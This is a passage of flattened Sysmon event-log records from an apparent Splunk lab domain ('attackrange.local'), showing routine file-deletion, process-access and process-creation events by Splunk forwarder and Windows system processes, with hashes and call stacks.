Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F34468D43B681C5D2673680BC5AAF85C,SHA256=34105B235A84E5A12A4261DB205008867BA77D582159CB0B5DCC10D5A5D290E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807304Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:52.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88FB3F624FFCBCB6D7E8CB105ABA3D70,SHA256=3EB22EC1F3D062C0043D92B895B56F69C6A1667B3E863CD0FECA09D8740F546E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.970{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.953{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.954{466BC892-F45C-60EB-207D-00000000CF01}5284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.606{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=014850D91F8C69BEAE80B855A07BB55D,SHA256=067A006DF47DB53D0442DFC2F73B461449768DC6E13E326C092E5F63A15865B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.553{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC3FA91E2CAC9077F88A931D109EFE92,SHA256=2D26026E7CEE18B9F55F6B78192B286722AFAF00AC0412360A7F760D7E9774A1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.273{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.270{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.269{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:52.254{466BC892-F45C-60EB-1F7D-00000000CF01}7900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807306Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:53.532{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D774ABE1936B04B3DB3DE9458DA87E24,SHA256=F5C9E7A5AFF1ED58E559784544CA6FAD84BF19BAE59E85FEC569020A582997A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048109Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.972{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=32F04346F76053DE3E9A035F2364CEF1,SHA256=2B3676AF19330C5F605ADB0F65B8FFD5C3A0A7622C83081073C7637E4598BF26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.837{466BC892-F45D-60EB-217D-00000000CF01}48288612C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.637{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.621{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.622{466BC892-F45D-60EB-217D-00000000CF01}4828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001048099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.574{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 